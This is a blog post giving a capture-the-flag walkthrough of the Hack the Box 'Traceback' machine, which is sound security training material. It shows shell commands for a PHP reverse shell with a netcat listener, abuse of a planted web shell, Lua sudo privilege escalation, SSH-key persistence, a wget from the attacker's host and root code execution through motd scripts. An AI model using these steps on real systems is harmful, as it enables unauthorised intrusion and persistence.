<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
    










    







<script defer language="javascript" type="text/javascript" src="/js/bundle.min.145453261a7755f5042a854c4213501d215a8fbe34c08d181c40f803f1315e74.js"></script>






    
    <meta http-equiv="content-type" content="text/html; charset=utf-8">

    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    
    <link rel="icon" href=/images/favicon.ico>

    
    





  





  
  
  


<!-- Open Graph image and Twitter Card metadata -->

<title itemprop="name">Ryan Kozak - Hack the Box Traceback Writeup</title>
<meta property="og:title" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Traceback&#32;Writeup />
<meta name="twitter:title" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Traceback&#32;Writeup />
<meta itemprop="name" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Traceback&#32;Writeup />
<meta name="application-name" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Traceback&#32;Writeup />
<meta property="og:site_name" content="Ryan Kozak" />


<meta name="description" content="" />
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />


<base href="https://ryankozak.com/posts/hack-the-box-traceback-writeup/" />
<link rel="canonical" href="https://ryankozak.com/posts/hack-the-box-traceback-writeup/" itemprop="url" />
<meta name="url" content="https://ryankozak.com/posts/hack-the-box-traceback-writeup/" />
<meta name="twitter:url" content="https://ryankozak.com/posts/hack-the-box-traceback-writeup/" />
<meta property="og:url" content="https://ryankozak.com/posts/hack-the-box-traceback-writeup/" />


<meta property="og:updated_time" content="2020-08-17T14:58:00-07:00" />


<link rel="sitemap" type="application/xml" title="Sitemap" href='https://ryankozak.com/sitemap.xml' />

<meta name="robots" content="index,follow" />
<meta name="googlebot" content="index,follow" />



<meta property="fb:admins" content="" />


<meta name="apple-mobile-web-app-title" content="Ryan Kozak" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />






<meta name="generator" content="Hugo 0.136.5">


    
    

<link type="text/css" rel="stylesheet" href="/css/bundle.min.94a339836f89f0d25f31980cb6b0631da21e20af128308747ce44e0525eb16ef.css">


    
    <style>
    body {
        --sidebar-bg-color: #202020;
        --sidebar-img-border-color: #515151;
        --sidebar-p-color: #909090;
        --sidebar-h1-color: #FFF;
        --sidebar-a-color: #FFF;
        --sidebar-socials-color: #FFF;
        --text-color: #222;
        --bkg-color: #FAF9F6;
        --post-title-color: #303030;
        --list-color: #5A5A5A;
        --link-color: #268BD2;
        --date-color: #515151;
        --table-border-color: #E5E5E5;
        --table-stripe-color: #F9F9F9;
        --code-color: #000;
        --code-background-color: #E5E5E5;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
        --moon-sun-color: #FFF;
        --moon-sun-background-color: #515151;
    }
    body.dark-theme {
        --text-color: #EEE;
        --bkg-color: #121212;
        --post-title-color: #DBE2E9;
        --list-color: #9D9D9D;
        --link-color: #268BD2;
        --date-color: #9A9A9A;
        --table-border-color: #515151;
        --table-stripe-color: #202020;
        --code-color: #FFF;
        --code-background-color: #515151;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
    }
    body {
        background-color: var(--bkg-color);
    }
</style>

</head>

    <body class="">
        <div class="wrapper">
            <aside class="sidebar">
    <div class="container sidebar-sticky">
        <div class="light-dark" align="right">
    <button class="btn-light-dark" title="Toggle light/dark mode">
        <svg class="moon" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M6 .278a.768.768 0 0 1 .08.858a7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277c.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316a.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71C0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"/>
        </svg>
        <svg class="sun" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M8 12a4 4 0 1 0 0-8a4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"/>
        </svg>
    </button>
</div>

        <div class="sidebar-about">
    <h1 class="brand">
        
            <a href="https://ryankozak.com/">
                <img src="/images/d0n601.jpg" alt="brand image">
            </a>
        
        
            <a href="https://ryankozak.com/">
                <h1>Ryan Kozak</h1>
            </a>
        
    </h1>
    <p class="lead">
    Hacking, web development, $other
    </p>
</div>

        <nav>
    <ul class="sidebar-nav">

        
        
        
        
            

            
                
                
                    <li class="heading">
                        <a href="/about">About</a>
                    </li>
                    
                
            
                
                
            
            
                
                
            
                
                
            
        
        
            

            
                
                
            
                
                
                    <li class="heading">
                        <a href="/posts/">Posts</a>
                    </li>
                    
                        <li class="sub-heading">
                            Recent
                        </li>
                        
                            <li class="bullet">
                                <a href="https://ryankozak.com/posts/cve-9162/">All-in-One WP Migration and Backup &lt;= 7.86 - Authenticated (Administrator&#43;) Arbitrary PHP Code Injection</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="https://ryankozak.com/posts/hack-the-box-armageddon-writeup/">Hack the Box Armageddon Writeup</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="https://ryankozak.com/posts/hack-the-box-ophiuchi-writeup/">Hack the Box Ophiuchi Writeup</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="https://ryankozak.com/posts/luks-encrypted-arch-linux-on-pinebook-pro-again/">Installing Arch Linux on the Pinebook Pro with LUKS Encrypted Root...Again</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="https://ryankozak.com/posts/luks-encrypted-arch-linux-on-pinebook-pro/">Installing Arch Linux on the Pinebook Pro with LUKS Encrypted Root</a>
                            </li>
                        
                    
                
            
            
                
                
            
                
                
            
        

    </ul>
</nav>

        
    <a target="_blank" class="social" title="GitHub" href="https://github.com/d0n601">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="-2 -2 24 24">
            <path fill="currentColor" d="M18.88 1.099C18.147.366 17.265 0 16.233 0H3.746C2.714 0 1.832.366 1.099 1.099C.366 1.832 0 2.714 0 3.746v12.487c0 1.032.366 1.914 1.099 2.647c.733.733 1.615 1.099 2.647 1.099H6.66c.19 0 .333-.007.429-.02a.504.504 0 0 0 .286-.169c.095-.1.143-.245.143-.435l-.007-.885c-.004-.564-.006-1.01-.006-1.34l-.3.052c-.19.035-.43.05-.721.046a5.555 5.555 0 0 1-.904-.091a2.026 2.026 0 0 1-.872-.39a1.651 1.651 0 0 1-.572-.8l-.13-.3a3.25 3.25 0 0 0-.41-.663c-.186-.243-.375-.407-.566-.494l-.09-.065a.956.956 0 0 1-.17-.156a.723.723 0 0 1-.117-.182c-.026-.061-.004-.111.065-.15c.07-.04.195-.059.378-.059l.26.04c.173.034.388.138.643.311a2.1 2.1 0 0 1 .631.677c.2.355.44.626.722.813c.282.186.566.28.852.28c.286 0 .533-.022.742-.065a2.59 2.59 0 0 0 .585-.196c.078-.58.29-1.028.637-1.34a8.907 8.907 0 0 1-1.333-.234a5.314 5.314 0 0 1-1.223-.507a3.5 3.5 0 0 1-1.047-.872c-.277-.347-.505-.802-.683-1.365c-.177-.564-.266-1.215-.266-1.952c0-1.049.342-1.942 1.027-2.68c-.32-.788-.29-1.673.091-2.652c.252-.079.625-.02 1.119.175c.494.195.856.362 1.086.5c.23.14.414.257.553.352a9.233 9.233 0 0 1 2.497-.338c.859 0 1.691.113 2.498.338l.494-.312a6.997 6.997 0 0 1 1.197-.572c.46-.174.81-.221 1.054-.143c.39.98.424 1.864.103 2.653c.685.737 1.028 1.63 1.028 2.68c0 .737-.089 1.39-.267 1.957c-.177.568-.407 1.023-.689 1.366a3.65 3.65 0 0 1-1.053.865c-.42.234-.828.403-1.223.507a8.9 8.9 0 0 1-1.333.235c.45.39.676 1.005.676 1.846v3.11c0 .147.021.266.065.357a.36.36 0 0 0 .208.189c.096.034.18.056.254.064c.074.01.18.013.318.013h2.914c1.032 0 1.914-.366 2.647-1.099c.732-.732 1.099-1.615 1.099-2.647V3.746c0-1.032-.367-1.914-1.1-2.647z"/>
        </svg>
    </a>



    <a target="_blank" class="social" title="LinkedIn" href="https://www.linkedin.com/in/ryan-kozak/">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 448 512">
            <path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5c0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7c-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5c67.2 0 79.7 44.3 79.7 101.9V416z"/>
        </svg>
    </a>















    <a target="_blank" class="social" title="RSS Feed" href="/posts/index.xml">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 1280.000000 1280.000000">
            <g transform="translate(0.000000,1280.000000) scale(0.100000,-0.100000)" fill="currentColor">
                <path d="M2295 11929 c-284 -12 -642 -45 -707 -65 -17 -5 -18 -63 -18 -1039 0 -569 4 -1036 8 -1039 5 -3 74 6 153 19 510 86 1168 95 1789 25 1348 -153 2602 -677 3670 -1531 385 -308 820 -744 1126 -1129 842 -1060 1362 -2313 1514 -3650 70 -621 61 -1279 -25 -1789 -13 -79 -22 -148 -19 -153 3 -4 471 -8 1039 -8 l1035 0 5 23 c51 225 85 942 67 1419 -23 605 -77 1044 -198 1617 -294 1400 -927 2734 -1823 3846 -1043 1295 -2364 2259 -3909 2854 -1158 447 -2451 656 -3707 600z"/>
                <path d="M2255 7845 c-269 -25 -620 -81 -667 -106 -17 -9 -18 -55 -18 -899 0 -706 3 -890 13 -890 6 0 66 18 132 41 130 44 288 79 467 105 154 21 577 30 749 15 1207 -107 2267 -823 2814 -1902 166 -327 268 -637 330 -1001 38 -227 48 -384 42 -662 -8 -348 -44 -590 -126 -831 -23 -66 -41 -126 -41 -132 0 -10 184 -13 890 -13 844 0 890 1 899 18 27 50 88 452 110 725 14 162 14 624 1 782 -59 703 -233 1323 -545 1945 -481 956 -1313 1788 -2270 2268 -620 310 -1239 483 -1940 542 -165 14 -669 10 -840 -5z"/>
                <path d="M2519 3815 c-391 -66 -725 -336 -868 -703 -79 -201 -96 -462 -45 -677 83 -344 338 -641 666 -774 116 -47 205 -69 330 -80 412 -39 811 153 1040 500 193 292 240 648 128 981 -135 403 -492 699 -914 757 -100 14 -241 12 -337 -4z"/>
            </g>
        </svg>
    </a>


    <a target="_blank" class="social" title="Email" href="mailto://whodis@ryankozak.com">
       <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 485.211 485.211">
            <path fill="currentColor" d="M301.393,241.631L464.866,424.56H20.332l163.474-182.928l58.801,51.443L301.393,241.631z M462.174,60.651H23.027 l219.579,192.142L462.174,60.651z M324.225,221.67l160.986,180.151V80.792L324.225,221.67z M0,80.792v321.029L160.972,221.64 L0,80.792z"/>
       </svg>
    </a>




        <p class="footnote">
    &copy; 2024 Ryan Kozak. All rights reserved.
</p>

  </div>
</aside>

            <main class="content container">
                <div class="post">
  <div class="info">
  <h1 class="post-title">
    <a href="https://ryankozak.com/posts/hack-the-box-traceback-writeup/">Hack the Box Traceback Writeup</a>
  </h1>

  <div class="headline">
    <div>
      
      
      <time datetime=" 2020-08-17T14:58:00-0700" class="post-date">
        August 17, 2020
      </time>
      
      <span> - </span>
      <span class="reading-time">
        
          
        

        <span>7 mins read</span>
      </span>
    </div>

    
  </div>

  
  

  
</div>

  <p><img src="/posts/images/hack-the-box-traceback-writeup/badge.png" alt="Hack The Box Traceback"></p>
<h1 id="introduction">Introduction</h1>
<p>Traceback is an easy level box. It&rsquo;s one of the first boxes on which I&rsquo;ve been able to get user and root in one sitting. There&rsquo;s a little bit of OSINT and guess work involved in the initial foothold, and the user/root portions aren&rsquo;t too difficult at all. The theme of the box is that it has already been compromised by another hacker (Xh4H who authoried the box), and you seem to be retracing their steps while gaining user and root flags.</p>
<h1 id="information-gathering">Information Gathering</h1>
<h2 id="port-scan-nmap">Port Scan: Nmap</h2>
<p>We begin our reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>root@kali:~# nmap -sVC 10.10.10.181
</span></span><span style="display:flex;"><span>Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-09 18:54 EDT
</span></span><span style="display:flex;"><span>Nmap scan report for 10.10.10.181
</span></span><span style="display:flex;"><span>Host is up (0.084s latency).
</span></span><span style="display:flex;"><span>Not shown: 998 closed ports
</span></span><span style="display:flex;"><span>PORT   STATE SERVICE VERSION
</span></span><span style="display:flex;"><span>22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
</span></span><span style="display:flex;"><span>| ssh-hostkey:
</span></span><span style="display:flex;"><span>|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
</span></span><span style="display:flex;"><span>|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
</span></span><span style="display:flex;"><span>|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
</span></span><span style="display:flex;"><span>80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
</span></span><span style="display:flex;"><span>|_http-server-header: Apache/2.4.29 (Ubuntu)
</span></span><span style="display:flex;"><span>|_http-title: Help us
</span></span><span style="display:flex;"><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style="display:flex;"><span>Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds
</span></span></code></pre></div><p>The only open ports on the machine are <strong>22</strong> and <strong>80</strong>. These are all we&rsquo;ll need to proceed through the rest of the box. so let&rsquo;s take a look at what&rsquo;s on the web port.</p>
<h3 id="port-80">Port 80</h3>
<p>Browsing to the website we can see that it&rsquo;s been defaced, and apparently they&rsquo;ve left a backdoor somewhere.</p>
<p><img src="/posts/images/hack-the-box-traceback-writeup/port80.png" alt="port80"><br>
<strong>Figure 1:</strong> This site has been owned by Xh4H.</p>
<p>Looking at the source code of the defaced page we find an HTML comment that indicates this backdoor is a webshell of some sort.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">body</span>&gt;
</span></span><span style="display:flex;"><span>	&lt;<span style="color:#f92672">center</span>&gt;
</span></span><span style="display:flex;"><span>		&lt;<span style="color:#f92672">h1</span>&gt;This site has been owned&lt;/<span style="color:#f92672">h1</span>&gt;
</span></span><span style="display:flex;"><span>		&lt;<span style="color:#f92672">h2</span>&gt;I have left a backdoor for all the net. FREE INTERNETZZZ&lt;/<span style="color:#f92672">h2</span>&gt;
</span></span><span style="display:flex;"><span>		&lt;<span style="color:#f92672">h3</span>&gt; - Xh4H - &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>		<span style="color:#75715e">&lt;!--Some of the best web shells that you might need ;)--&gt;</span>
</span></span><span style="display:flex;"><span>	&lt;/<span style="color:#f92672">center</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">body</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">html</span>&gt;
</span></span></code></pre></div><h3 id="osint">OSINT</h3>
<p>After searching for <em>Xh4H</em> on Google, the first hit is a <a href="https://github.com/Xh4H/" target="_blank">GitHub profile</a>. Browsing through his repositories a bit there&rsquo;s one called <a href="https://github.com/Xh4H/Web-Shells" target="_blank">Web-Shells</a> which he&rsquo;s forked from another repository.</p>
<p><img src="/posts/images/hack-the-box-traceback-writeup/web-shells.png" alt="web-shells"><br>
<strong>Figure 2:</strong> Xh4H&rsquo;s Web-Shells repository.</p>
<p>There are 16 different shells in this repo, 15 of which are <em>php</em> shells.</p>
<h1 id="exploitation">Exploitation</h1>
<h2 id="initial-foothold">Initial foothold</h2>
<p>Trying each shell in the repository we eventually find that <code>http:10.10.10.181/smevk.php</code> is the backdoor. This is the second to last shell in the repository.<br>
<img src="/posts/images/hack-the-box-traceback-writeup/smevk_login_page.png" alt="smevk_login_page"><br>
<strong>Figure 3:</strong> We found the backdoor, but it&rsquo;s closed.</p>
<p>There&rsquo;s a login page to <code>smevk</code>, but it turns out that the credentials are simply <code>admin:admin</code>. That was my first guess.</p>
<p><img src="/posts/images/hack-the-box-traceback-writeup/smevk_logged_in.png" alt="smevk_logged_in"><br>
<strong>Figure 4:</strong> We&rsquo;re in through the backdoor.</p>
<h2 id="user-flag">User Flag</h2>
<p>I&rsquo;m a n00b, so I haven&rsquo;t used many web shells besides <code>c99</code> and <code>p0wny</code>. As I explored the features of <code>smevk</code> I came to find some of them quite useful. The menu includes <em>Sec. Info</em>, <em>Files</em>, <em>Console</em>, <em>Bypasser</em>, <em>Safe Mode</em>, <em>String tools</em>, <em>Import Scripts</em>, <em>Network</em>, <em>Readable Dirs</em>, <em>Defacer</em>, <em>Code Injector</em>, <em>Domains</em>, and  <em>logout button</em>. A lot of these features seemed neat but the only ones I really utilized are the file explorer and the file uploader.</p>
<p>Navigating directly to the <code>/home</code> directory we see two users <code>sysadmin</code> and <code>webadmin</code>.<br>
<img src="/posts/images/hack-the-box-traceback-writeup/home_directory.png" alt="home_directory"><br>
<strong>Figure 5:</strong> The <code>/home</code> directory shows two users.</p>
<p>In this case we&rsquo;re logged in as <code>webadmin</code>, and don&rsquo;t have access to the <code>sysadmin</code> directory. The flag  doesn&rsquo;t appear to be in our <code>/home/webadmin</code> directory, but other useful things definitely are (<code>note.txt</code> and <code>.bash_history</code>).<br>
<img src="/posts/images/hack-the-box-traceback-writeup/home_webadmin.png" alt="home_webadmin"><br>
<strong>Figure 6:</strong> Some interesting files in our home directory, but not flag.</p>
<p>Exploring the <code>note.txt</code> file we can see it mentions that there&rsquo;s Lua installed on the box for us to &ldquo;practice&rdquo; with.</p>
<p><img src="/posts/images/hack-the-box-traceback-writeup/note.png" alt="note"><br>
<strong>Figure 7:</strong> Contents of <code>note.txt</code>.</p>
<p>Initially I thought that the <code>.bash_history</code> may have been a spoiler left by another user. I realize now though that we&rsquo;re supposed to find it, and &ldquo;trace back the steps&rdquo; of the initial exploitation.  <code>.bash_history</code> tells us very explicitly where Lua is, and how to execute it as the <code>sysadmin</code> user. We simply need to create the <code>privesc.lua</code> file ourself as it appears to have been removed after execution.<br>
<img src="/posts/images/hack-the-box-traceback-writeup/what.png" alt="what"><br>
<strong>Figure 8:</strong> The contents of <code>.bash_history</code> are basically a guide to getting the user flag.</p>
<p>We need only to look at <a href="https://gtfobins.github.io/gtfobins/lua/" target="_blank">GTFO Bins Lua section</a> to determine the syntax to launch a shell in Lua, something like <code>os.execute(&quot;/bin/sh&quot;)</code> will work.</p>
<p>To create our Lua script and launch it for a privilege escalation to <code>sysadmin</code> we&rsquo;re going to need a reverse shell on the machine. To do this we&rsquo;ll launch a netcat listener via <code>nc -lvp 4444</code> and upload a php revers shell named <code>x.php</code>. Navigating to <code>http:10.10.10.181/x.php</code> with trigger the reverse shell to call back to us.</p>
<p><img src="/posts/images/hack-the-box-traceback-writeup/shell_upload.png" alt="shell_upload"><br>
<strong>Figure 9:</strong> Uploading <code>x.php</code>, our reverse shell.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>root@kali:~# nc -lvp 4444
</span></span><span style="display:flex;"><span>listening on [any] 4444 ...
</span></span><span style="display:flex;"><span>connect to [10.10.15.38] from traceback.htb [10.10.10.181] 47416
</span></span><span style="display:flex;"><span>Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
</span></span><span style="display:flex;"><span> 11:44:37 up  1:45,  0 users,  load average: 0.00, 0.01, 0.00
</span></span><span style="display:flex;"><span>USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
</span></span><span style="display:flex;"><span>uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
</span></span><span style="display:flex;"><span>/bin/sh: 0: can&#39;t access tty; job control turned off
</span></span><span style="display:flex;"><span>$   
</span></span></code></pre></div><p>Once we&rsquo;ve got the reverse shell going we&rsquo;ll create the Lua file next and execute it for privilege escalation to <code>sysadmin</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ echo <span style="color:#e6db74">&#34;os.execute(&#39;/bin/bash&#39;)&#34;</span> &gt; privesc.lua
</span></span><span style="display:flex;"><span>$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
</span></span><span style="display:flex;"><span>sh: turning off NDELAY mode
</span></span><span style="display:flex;"><span>whoami
</span></span><span style="display:flex;"><span>sysadmin
</span></span><span style="display:flex;"><span>cd /home/sysadmin
</span></span><span style="display:flex;"><span>cat user.txt
</span></span><span style="display:flex;"><span>82f71c69e2692140bd21f923d0707f05
</span></span></code></pre></div><h2 id="root-flag">Root Flag</h2>
<p>Before we start trying to escalate privileges to root we&rsquo;re going to get a proper ssh session going on the box so that we don&rsquo;t have to work within this reverse shell. To do so we&rsquo;ll simply add our public key to <code>/home/sysadmin/.ssh/authorized_keys</code>.</p>
<pre tabindex="0"><code>echo &#34;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCx7eDPx1R6wLygP7rzBH7L0PdPeMbZU1pyFpOJN45DuXiaor1bx2DksSKwNNPI7TiiTTNWplVdDGcW4p/ISVOoXLEP0W99QH8MB57HnMFShpuhNNJCCfhfLS1FEfD+iApR3RTZXnv13SBb/gLq21idHfBMes6A7Ba9Eba2gBbeWoIBF27PDXZER076r6LGHFdjHWFMJrdMOPDqdzYefBIVkGgbHqVRb0bd7IKi6NEMcAzL12BYnmIAXnJ789L+qDxGRam3hcImhV2mHpXpNJaunj9AUydxHgaKMY97x9REND2YGBPiCowb60qQTwDtIKfTEsAUOxJ6vQWVbdkxEsOr4HDe8azY30pL9vBjv8DT0rvC7ndVfy+maZ33sb/tvsVm5cw8mJZRnB/SEkHn4atDwR2CiX/FlWSmCV8s90bKBcRgJyW5+z7MyBTJ95g5hgGOpk20JEyl+P+EyZEai7l4j5ToCYnfmCX0ZdR3XNT3yI8oweCiRraHeiaqnn3Guxk= root@kali
&#34; &gt;&gt; ~/.ssh/authorized_keys
</code></pre><p>Now we&rsquo;ll ssh back into the box as <code>sysadmin</code>.<br>
<img src="/posts/images/hack-the-box-traceback-writeup/ssh_in_user.png" alt="ssh_in_user"><br>
<strong>Figure 10:</strong> ssh&rsquo;ing back in as <code>sysadmin</code> and launching bash.</p>
<p>To monitor the running processes we&rsquo;ll download <a href="https://github.com/DominicBreuker/pspy" target="_blank">pspy</a> from our Kali box&rsquo;s Apache server into the <code>/tmp</code> directory of the machine.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Console" data-lang="Console"><span style="display:flex;"><span>sysadmin@traceback:~$ cd /tmp
</span></span><span style="display:flex;"><span>sysadmin@traceback:/tmp$ wget http://10.10.15.38/pspy64
</span></span><span style="display:flex;"><span>--2020-04-10 12:40:27--  http://10.10.15.38/pspy64
</span></span><span style="display:flex;"><span>Connecting to 10.10.15.38:80... connected.
</span></span><span style="display:flex;"><span>HTTP request sent, awaiting response... 200 OK
</span></span><span style="display:flex;"><span>Length: 3078592 (2.9M)
</span></span><span style="display:flex;"><span>Saving to: ‘pspy64’
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>pspy64                              100%[=================================================================&gt;]   2.94M   808KB/s    in 4.9s    
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>2020-04-10 12:40:32 (611 KB/s) - ‘pspy64’ saved [3078592/3078592]
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>sysadmin@traceback:/tmp$
</span></span></code></pre></div><p>Launching it we can see that <code>/etc/.update-motd.d/</code> is being replaced about every 30 seconds. When we ssh&rsquo;d into the box it was clear that this has been modified by the attacker previously. <strong>Welcome to Xh4H land</strong></p>
<p><img src="/posts/images/hack-the-box-traceback-writeup/pspy.png" alt="pspy">
<strong>Figure 11:</strong> <code>/etc/.update-motd.d</code> being overwritten every 30 seconds from a backup directory.</p>
<p>We have permission as the <code>sysadmin</code> user to modify these files, and in doing so we can execute code as root.</p>
<pre tabindex="0"><code>sysadmin@traceback:/etc/update-motd.d$ ls -lah
total 32K
drwxr-xr-x  2 root sysadmin 4.0K Aug 27  2019 .
drwxr-xr-x 80 root root     4.0K Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Apr 10 12:47 00-header
-rwxrwxr-x  1 root sysadmin  982 Apr 10 12:47 10-help-text
-rwxrwxr-x  1 root sysadmin 4.2K Apr 10 12:47 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Apr 10 12:47 80-esm
-rwxrwxr-x  1 root sysadmin  299 Apr 10 12:47 91-release-upgrade
</code></pre><p>We&rsquo;ll modify the <code>00-header</code> file to copy the <code>sysadmin</code> user&rsquo;s <code>authorized_keys</code> file into the <code>authorized_keys</code> file of the <code>root</code> user.</p>
<pre tabindex="0"><code>sysadmin@traceback:/etc/update-motd.d$ echo &#34;ls -lah /root/.ssh &amp;&amp; cat /home/sysadmin/.ssh/authorized_keys &gt;&gt; /root/.ssh/authorized_keys &amp;&amp; cat /root/.ssh/authorized_keys&#34; &gt;&gt; 00-header
</code></pre><p>Once we&rsquo;ve done this, we quickly need to ssh into the box again before the <code>00-header</code> file is overwritten by the backup. If we do this quickly enough, our new login will trigger the code we&rsquo;ve placed into <code>00-header</code> to be executed, and our <code>id_rsa.pub</code> is copied into <code>/root/.ssh/authorized_keys</code>. Now we can ssh into the box as root and grab the flag.<br>
<strong>Note:</strong> Yes we could have just placed <code>cat /root/root.txt</code> into the <code>00-header</code> and gotten the flag that way, but getting a root shell is much more satisfying.</p>
<p><img src="/posts/images/hack-the-box-traceback-writeup/rooted.png" alt="rooted"><br>
<strong>Figure 12:</strong> f1af5eb9875c8514dbb32168383cfd52</p>
<h1 id="conclusion">Conclusion</h1>
<p>This box was fairly easy, which was nice because it&rsquo;s rated as such. I enjoyed the theme of it, another hacker has compromised the machine and left messages around. Getting the user flag was really straight forward given the <code>.bash_history</code> file telling us exactly what to do. The path to root was extremely similar to the <a href="https://ryankozak.com/hack-the-box-writeup-4-writeup/" target="_blank">Writeup</a> box, and because of that it was kind of a breeze. It was quick and fairly fun, and that&rsquo;s it.</p>
<h1 id="references">References</h1>
<ol>
<li><a href="https://github.com/Xh4H/Web-Shells" target="_blank">Xh4H&rsquo;s Web-Shells</a></li>
<li><a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php" target="_blank">Pentest Monkey&rsquo;s PHP Reverse Shell</a></li>
<li><a href="https://gtfobins.github.io/gtfobins/lua/" target="_blank">GTFO Bins Lua</a></li>
</ol>

  
  <hr>
<div class="footer">
    
	    
